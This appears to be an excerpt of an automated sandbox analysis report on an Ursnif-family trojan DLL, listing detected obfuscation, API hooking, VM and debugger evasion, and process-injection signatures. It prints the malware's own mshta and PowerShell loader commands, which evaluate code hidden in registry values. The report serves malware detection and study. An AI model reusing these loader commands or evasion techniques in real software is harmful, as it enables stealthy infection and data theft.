Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E2193 push ecx; ret 1_2_6D8E21A3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E2140 push ecx; ret 1_2_6D8E2149
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8FD3F0 push ecx; mov dword ptr [esp], ecx 1_2_6D8FD3F1
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D954477 pushad ; retf 1_2_6D95451E

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\mshta.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2913 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6007 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe TID: 6596 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW, 1_2_6D921B50
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D91C480
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D925480 OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__cftoe,__aligned_msize,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__CrtDbgReportWV, 1_2_6D925480
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D9211D0 mov ecx, dword ptr fs:[00000030h] 1_2_6D9211D0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D914880 mov eax, dword ptr fs:[00000030h] 1_2_6D914880
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D921310 mov ecx, dword ptr fs:[00000030h] 1_2_6D921310
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D9525FE mov eax, dword ptr fs:[00000030h] 1_2_6D9525FE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D952534 mov eax, dword ptr fs:[00000030h] 1_2_6D952534
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D95213B push dword ptr fs:[00000030h] 1_2_6D95213B
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D91C480
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D906930 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D906930
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D906AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6D906AA0

HIPS / PFW / Operating System Protection Evasion:

barindex
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: AE131580 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3292 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D906610 cpuid 1_2_6D906610
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 1_2_6D8E1B13
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_6D8E1000
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_6D8E166F
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
